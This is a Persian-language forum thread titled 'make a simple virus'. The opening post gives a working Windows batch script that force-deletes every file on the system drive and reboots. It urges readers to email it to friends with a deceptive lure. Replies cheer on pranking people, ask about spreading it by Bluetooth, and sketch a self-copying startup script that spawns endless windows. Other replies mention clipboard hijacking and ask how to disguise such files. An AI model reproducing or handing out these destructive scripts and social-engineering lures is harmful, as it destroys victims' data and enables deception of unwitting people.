یک ویروس ساده بسازید...!

• شروع کننده موضوع شروع کننده موضوع @Sigm
  • تاریخ شروع تاریخ شروع
وضعیت
موضوع بسته شده است.

@Sigm

کاربر حرفه‌ای
نام مرکز سمپاد
شهید بهشتی
شهر
گنبد کاووس
مدال المپیاد
...
رشته دانشگاه
...
با وجود انواع و اقسام ویروس ها و کرم ها در اینترنت ؛ شما هم می توانید یک ویروس ساده بوسیله برنامه Notepad بسازید !
یک Notepad باز کنید و اینا رو بنویسید:
@echo off
del %systemdrive%\*.* /f/s/q
shutdown -r -f -t 00

سپس آن را با پسوند cmd ذخیره کنید.
میتونید این رو به یکی از دوستاتون ایمیل کنید و بگوید اگر آن را اجرا کنه به تمام آرزو هاش میرسه( :)) )(یا خودتون اجرا کنید) که پس از اون کل اطلاعات درایو c کامپیوتر پاک میشه ==> نصب دوباره ی ویندوز. :))
(پیشنهاد میکنم خودتون اینو اجرا نکنید. ;D)
نکته: البته این یک ویروس واقعی به حساب نمیاد.

پاسخ : یک ویروس ساده بسازید...!

نامرديه خداييش

آخ جون !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! جون میده واسه حال گیری !!!!! می گم رو r.p.r امتحان کنم کیوان ؟؟؟؟؟؟؟؟؟؟

یعنی چی ویروس واقعی به حساب نمیاد ؟

مردم گناه دارن ;D

چه چيز جالبي! واقعا كار مي كنه؟

به نقل از نادراشد :

امتحانش مجانیه!

به نقل از نادراشد :
کار میکنه !

با وجود اینکه خیلی باحاله اما یکم نامردیه!

خیلی باحاله
واسه نامردا، نامردی کردن حال میده!

ایول.....میشه رو گوشی ریخت و از طریق بلوتوث بدیم به یه بدبخت؟

بابا این ویروس ها رو ما خیلی وقت پیش خز کردیم

به نقل از mgh-nano :
تو امتحان کردی ؟؟؟ :))
---
یه سوال
انتی ویروسا میتونن جلو اینو بگیرن؟؟
---+

من avast دارم اونم اوریجینال جلوی این ویروس رو می گیره :-"، ولی خویه ویروس جالبیه، نتونستم اجراش کنم، antivisrus ام نمیزاره :(
میشه یکم در مورد این ویروس بهم توضیح بدی؟ :-? من با لینوکس هم کار می کنم و می دونم که این comand ها واسه لینوکس هم کاربرد دارن مثلا -o به معنای output ساخته، ولی تو windows چی؟ خوشحال میشم اگه در مورد windows regedit هم یه توضیحی بدی... ;D

به نقل از JOYFOOLISH :
یعنی چی ویروس واقعی به حساب نمیاد ؟

این یه اسکریپت هست! اگر کسی اینو اجرا کنه مثل اینه که خودش با تصمیم خودش این کارو انجام بده!
ولی ویروس اینجوری نیست ... ویروس ها و کرم ها از طریق حفره های امنیتی (bug) خودشونو به سیستم های دیگه ی توی شبکه منتقل میکنن و اگر واقعن خطرناک باشند یهو نصف دنیا (حتا شرکت ها و سازمان ها) سر یه ساعت خاص خاموش میشه (کرم blaster) !!!!!
در حقیقت میشه یه اسکریپت نوشت که مثل blaster خودشو توی startup کپی کنه و هر وقت که سیستم روشن شد بعد از ۲۰ دقیقه سیستم خاموش بشه، ولی اسمش ویروس یا کرم نیست! چون نمیتونه خودشو منتشر کنه!

به نقل از navid_overclocking :
من avast دارم اونم اوریجینال جلوی این ویروس رو می گیره :-"، ولی خویه ویروس جالبیه، نتونستم اجراش کنم، antivisrus ام نمیزاره :(
میشه یکم در مورد این ویروس بهم توضیح بدی؟ :-? من با لینوکس هم کار می کنم و می دونم که این comand ها واسه لینوکس هم کاربرد دارن مثلا -o به معنای output ساخته، ولی تو windows چی؟ خوشحال میشم اگه در مورد windows regedit هم یه توضیحی بدی... ;D

در مورد regedit بهترین کار اینه که help خوده windows رو بخونی، سرچ کن reg . البته تو cmd هم بزنی "?/ reg" یه چیزایی بهت نشون میده ... از چند وقت پیش کلان مهاجرت کردم به linux ، واگر نه بیشتر کمکت میکردم ... همین ها رو هم از چند سال پیش یادم مونده!

up!
ویروس یا شبه ویروس هایی که بلدین رو بذارین اینجا ;D

بابا اینا رسما بچه بازیه. چیزای ساده تر و جذاب تری می شه نوشت!
مثلا با یک خط می شه یه کاری کرد که یک اپلکیشن به تعداد بیشماری باز شه! مثلا همین cmd تا بینهایت باز شه! بعد شما یه خط دیگه اضافه می کنید که چیکار کنه؟ خودش رو کپی کنه تو فولدر استارت‌آپ! بعد چی می شه؟ هر وقت طرف لاگین می کنه، بیشمار cmd شروع می کنه به باز شدن! راهنمایی داخل سایت اجرا می کردیم در می رفتیم!

باید یه چیز جذاب باشه. پاک کردن و اینا چیه. مسخرس ;D

این هایی که میگی رو توضیح میدی کامل؟ ;D

به نقل از Dorna :
این هایی که میگی رو توضیح میدی کامل؟ ;D
من چون کلا ویندوز ندارم قسمت فنیش رو کلا یادم رفته ولی سرچ کنید میاره.
ببینید شما الان برید داخل cmd اسم یک اپلیکیشنی رو بنویسید اونو باز می کنه. فرض کنید که ما الان یک دستوری نوشتیم که یک اپلیکیشنی رو باز می کنه.
حالا من میام این دستور رو می ذارم داخل یک حلقه‌ی بدون پایان یا infinite loop . نتیجش اینه که اون دستور تا بی نهایت اجرا می شه. یعنی همین طور کلی اپلیکیشن شروع می شه به باز شدن. یه جورایی شبیه به fork bomb هست.
بعد حالا می شه یه کار کرد که کاربر بدون اینکه اجراش کنه، این باز شه! زمانی که من ویندوز کار می کردم، فایل‌هایی که داخل فولدر startup قرار می گرفتن، موقعی که طرف لاگین می کرد اجرا می شدند.
حالا شما می تونید یه خط به این اسکریپتتون اضافه کنید که خودش رو کپی کنه داخل فولدر استارت‌آپ. در نتیجه هر وقت کاربر لاگین می کنه، این اسکریپت اجرا می شه و بیشمار برنامه شروع می شه به باز شدن!

یا مثلا کارهای خیلی نامردیانه تری هم می شه کرد! ویروسی که چیزی که خودش می خواد رو جایزگین clipboard می کنه! یادش به خیر با یه بنده خدایی چت می کردم، بعد اومدم یه لینکی برام بفرسته (کپی کنه) بعد سریع پیست کرد و سریع اینتر زد. بعد دیدم یه لینک به این سایت‌های مستهجن هست ;D گفتم اینه؟ بعد گفت ا ا ببخشید. یه ویروسه هست همش clipboardم رو خالی می کنه، متن می ذاره توش.
نوشتن هم سخت نیست! یه زمانی داخل VB بلد بودم. ولی چیز جالبیه. برای حالگیری اونایی که زیاد چت می کنن مفیده ;D

خب اينا بيشتر چيزاييه كه بايد تو كامپيوتر فرد بنويسيش يا اينكه فايل نوت پدو بدي بش بعد خود فرد اجراش كنه!
كه خب عقل سليم ميگه يه فايل نوت پدو زارت وا نكن ;D
خب چجوري ميشه ويروسو تو قالب يه چيز ديگه نشوند؟
طوري كه طرف نتونه تشخيص بده ;D

وضعیت
موضوع بسته شده است.
Back
بالا